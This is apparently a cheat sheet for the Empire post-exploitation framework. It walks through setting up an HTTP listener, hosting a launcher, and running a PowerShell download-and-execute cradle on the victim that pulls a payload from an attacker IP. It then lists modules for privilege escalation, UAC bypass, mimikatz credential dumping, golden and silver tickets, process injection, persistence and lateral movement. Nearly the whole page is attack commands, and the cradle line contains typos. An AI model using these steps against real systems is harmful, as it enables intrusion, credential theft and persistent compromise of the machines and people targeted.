Skip to content

Empire

Empire

https://adsecurity.org/wp-content/uploads/2019/09/2019-DerbyCon-ActiveDirectorySecurity-BeyondTheEasyButton-Metcalf.pdf
Empire Repo

Empire Cheatsheet

Setup Empire

docker pull empireproject/empire
docker run -i -t empire /bin/bash
root@5e3c3ad291b1:/opt/Empire# pip install pefile
root@5e3c3ad291b1:/opt/Empire# ./empire

Creating a launcher

Searching Modules:

(Empire) > searchmodule portscan

 powershell/situational_awareness/network/portscan

	Does a simple port scan using regular sockets, based (pretty) loosely
	on nmap.

Searching Modules:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.1.13:8001
(Empire: listeners/http) > set Port 8001
(Empire: listeners/http) > launcher powershell 
#Copy to file set up websever
sudo python -m SimpleHTTPServer 80

Load module on Victim:

IEX(New-Oject New.WebClient).downloadString('http://10.10.1.13/empire.ps1')

Interacting with an agent

Creating a Backup agent:

(Empire: listeners/http) > back
(Empire: listeners) > back
(Empire) > agents
(Empire: agents) > interact [agent_name]
#Make a background script in case the first dies
(Empire: UCVZ81NY) > spawn http

Run Custom Modules:

(Empire: UCVZ81NY) > usemodule powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/privesc/gpp
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/management/psinject <PID>
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/privesc/bypassuac_wscript
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/golden_ticket
(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/credentials/mimikatz/silver_ticket


(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/persistence/userland/registry
(Empire: powershell/privesc/powerup/allchecks) > usemodule persistence/userland/schtasks


(Empire: powershell/privesc/powerup/allchecks) > usemodule powershell/situational_awareness/network/powerview/share_finder
(Empire: powershell/situational_awareness/network/powerview/share_finder) > set CheckShareAccess 
(Empire: powershell/situational_awareness/network/powerview/share_finder) >

Run Modules:

(Empire: UCVZ81NY) > usemodule lateral_movement/invoke_portfwd

Create a a new plugin

Make a Powershell Template:

cp Empire/lib/modules/powershell_template.py .